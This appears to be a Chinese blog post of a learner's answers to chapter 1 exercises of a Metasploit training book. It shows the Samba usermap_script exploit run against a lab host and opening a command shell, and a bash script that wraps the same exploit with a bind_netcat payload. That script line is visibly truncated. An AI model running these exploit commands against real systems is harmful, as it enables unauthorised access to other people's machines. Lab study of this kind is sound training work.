书本p39
1、The time line is as follows:

* May 7, 2007: Initial defect disclosure to the security@samba.org

email alias.

* May 7, 2007: Initial developer response by Samba

developer Gerald Carter.

* May 9, 2007: Patch released by Samba developer Jeremy

Allison to iDefense for testing.

* May 10, Announcement to vendor-sec mailing list

* May 14, 2007: Public announcement of the security issue.

2、  先找出metasploit安装位置:

# dpkg -S metasploit

在/usr/share/metasploit-framework中

/usr/share/metasploit-framework/modules/exploits# ls

aix      apple_ios  dialup   freebsd  irix   multi    osx      unix

android  bsdi       firefox  hpux     linux  netware  solaris  windows

用Linux Shell命令统计出分别针对Windows 2000、Windows XP……目标环境的渗透攻击模块数量(不会,暂且跳过)

3、运行msfconsole:

msf > db_status

[*] postgresql selected, no connection

解决办法可参考:http://r-7.co/MSF-DEV#set-up-postgresql (太长,我还没试验过)

因为和书上有不少不同之处,我最后还是直接决定用作者提供的BT5虚拟镜像。

换上bt5后,好酷炫的界面!但是ip地址是10.10.10.129,和剧本不符!重新设置下:

# vi /etc/networks/interface

…skip…(将ip配置为静态的10.10.10.128)

# /etc/init.d/networking restart

打开msfconsole:

msf > db_status

[*] postgresql connected to msf3dev

补充: 关于kali 2.0中msf与数据库连接的问题,可参考http://www.cnblogs.com/justforfun12/p/5205804.html

数据库的问题解决!

msf> use exploit/multi/samba/usermap_script

msf> show options

msf> set RHOST 10.10.10.254

msf> exploit
[*] Command shell session 1 opened (10.10.10.128:4444 -> 10.10.10.254:33721)

成功得到shell

VNC不熟悉,暂且跳过。

5、

# vim us_attack.sh

   #!/bin/bash

   #

   # A shell script that uses usermap_script exploit to penetrate

   # other's system.

   # User needs to input the ip for RHOST as the only parameter.

   #

   # 2016.2.     by Jack

   #

  msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat   RHOST=$ E

执行

# sh us_attack.sh 10.10.10.254

搞定!

不过发现了个问题:就是一开始从BT5去ping 10.10.10.254(NAT)是ping 不通的,需要先从NAT ping回10.10.10.128(NAT)才行。

用BT5其实也有很大问题,因为它的服务器停止更新,APT-GET 不能用了!

《Metasploit魔鬼训练营》第一章习题的更多相关文章

  1. Metasploit魔鬼训练营第一章作业

    1, Samba服务 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成.SMB(Server Messages Block,信息服务块)是一种在局域网上共 ...

  2. MSF魔鬼训练营第一章 初识Metasploit

    1.1.4渗透测试过程环节 PTES标准7个阶段 1.前期交互阶段      收集客户需求.准备测试计划.定义测试范围与边界.定义业务目标.项目管理与规划等 2.情报搜集阶段      公开来源信息查 ...

  3. 算法竞赛入门经典第二版第一章习题-(练习Java和C++语法)

    习题1-1 平均数(average) 输入三个整数,输出他们的平均值,保留三位小数 Java: package suanfa; import java.util.Scanner; public cla ...

  4. Python《学习手册:第一章-习题》

    人们选择Python的六大主要原因是什么? 软件质量:Python注重可读性.一致性和软件质量. Python代码的设计致力于可读性,因此具备了比传统脚本语言更优秀的可重用性和可维护性. Python ...

  5. JAVA 编程思想第一章习题

    //: ch1.01/IntChar.java package object; import java.util.*; public class IntChar { int x; char y; pu ...

  6. lua程序设计 第一章习题答案

    练习1.1:运行阶乘的示例并观察,如果输入负数,程序会出现什么问题?试着修改代码来解决问题. 答:当输入负数时,循环无法终止,因为原本程序中的终止条件为n==0,而在输入为负数情况下,无法达成此终止条 ...

  7. Computing Essentials_第一章习题

  8. 04373 C++程序设计 2019版 第一章习题五、程序设计题

    题目: 1.编写一个程序,将从键盘输入的n个字符串保存在一个一维数组A中.在输入字符串之前,先输入n的值.要求,数组A需要动态申请空间,程序运行结束前再释放掉. #include <iostre ...

  9. 【转】apue《UNIX环境高级编程第三版》第一章答案详解

    原文网址:http://blog.csdn.net/hubbybob1/article/details/40859835 大家好,从这周开始学习apue<UNIX环境高级编程第三版>,在此 ...

随机推荐

  1. 简说chart2.4的应用,以及Uncaught ReferenceError : require is not defined的解决

    51呢最近在学习chart.js,然后呢就照着中文的帮助文档来然后就一直出Uncaught ReferenceError : require is not defined的问题查了挺多才知道是帮助文档 ...

  2. Windows系统下Nginx的安装与配置

    Nginx是lgor Sysoev在2004年的时候为俄罗斯访问量第二大的rambler.ru站点设计开发的,发布至今,凭借开源的力量,已经接近成熟与完善.其功能丰富,可作为HTTP服务器,也可作为反 ...

  3. 【深度学习】keras + tensorflow 实现猫和狗图像分类

    本文主要是使用[监督学习]实现一个图像分类器,目的是识别图片是猫还是狗. 从[数据预处理]到 [图片预测]实现一个完整的流程, 当然这个分类在 Kaggle 上已经有人用[迁移学习](VGG,Resn ...

  4. MapReduce-实践1

      MR进阶实践1:  -file 分发多个文件 [-file 适合场景]分发文件在本地,小文件 -file分发原理         run.sh文件: 通过多个-file, 将多个本地文件分发到Ha ...

  5. jQuery在项目中的应用

    版权声明:本文为博主原创文章,未经博主允许不得转载.(转载需注明出处 http://www.cnblogs.com/yanfei1819/p/7743661.html) [摘要]   最近在项目中应用 ...

  6. win7与centos虚拟机的共享文件夹创建

    本文在win7环境下,在virtualbox5.0.16中的虚拟机centos6.7创建linux虚拟机与win7主机的共享文件夹. 首先点击virtualbox上"设置"按钮,在 ...

  7. scala攻略--简介

    在个人学习scala的过程中,产生了写一系列随笔的想法,这些随笔包括:翻译自官网.其他英文网站的文章以及自己的心得体会,本文章作为这个系列中的第一个. 由于本人能力所限,以及对scala还处于初级阶段 ...

  8. nginx + tomcat + redis 部署项目,解决session共享问题。

    最近自己搭了一套nginx的环境,集群部署了公司的一个项目,中间解决了session共享的问题.记录如下,以备日后查看. 1.环境 windows10 家庭中文版,jdk 7, tomcat 7.0. ...

  9. vue 起步走 --“安装篇”

    在说明之前,溶解得在这说一句 ,菜鸟开始安装这些东西真是不容易,各种疯狂的百度,搜索.(找的我眼泪都快流下来了),不说废话,开始正经. 第一步:环境的搭建 : vue推荐开发环境: Node.js: ...

  10. [译]ASP.NET Core 2.0 视图引擎

    问题 如何在ASP.NET Core 2.0中使用Razor引擎来创建视图? 答案 新建一个空项目,修改Startup.cs,添加MVC服务和请求中间件: public void ConfigureS ...